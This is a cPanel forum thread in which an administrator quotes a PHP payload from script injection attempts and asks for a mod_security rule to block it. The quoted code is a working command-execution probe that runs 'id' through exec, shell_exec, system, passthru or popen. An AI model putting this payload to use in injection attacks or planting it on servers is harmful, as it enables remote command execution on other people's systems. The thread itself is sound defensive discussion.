Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Mic22 Attacks

Discussion in 'General Discussion' started by Solokron, Oct 30, 2007.

  1. Solokron

    Solokron Well-Known Member

    Joined:
    Aug 8, 2003
    Messages:
    850
    Likes Received:
    1
    Trophy Points:
    168
    Location:
    Seattle
    cPanel Access Level:
    DataCenter Provider
    I have been seeing a lot of script injection attempts with the following code.

    Code:
    <?php
    echo "Mic22";
    $cmd="id";
    $eseguicmd=ex($cmd);
    echo $eseguicmd;
    
    function ex($cfe){
    $res = '';
    if (!empty($cfe)){
    if(function_exists('exec')){
    @exec($cfe,$res);
    $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec')){
    $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists('passthru')){
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }}
    return $res;
    }
    exit;

    Has anyone come up with a mod security rule specifically for these? Googling only showed a lot of foreign sites.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  2. gizzmo2006

    gizzmo2006 Active Member

    Joined:
    May 22, 2007
    Messages:
    36
    Likes Received:
    1
    Trophy Points:
    158
  3. Solokron

    Solokron Well-Known Member

    Joined:
    Aug 8, 2003
    Messages:
    850
    Likes Received:
    1
    Trophy Points:
    168
    Location:
    Seattle
    cPanel Access Level:
    DataCenter Provider
    Yes, I am already aware of that site, thank you.


     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice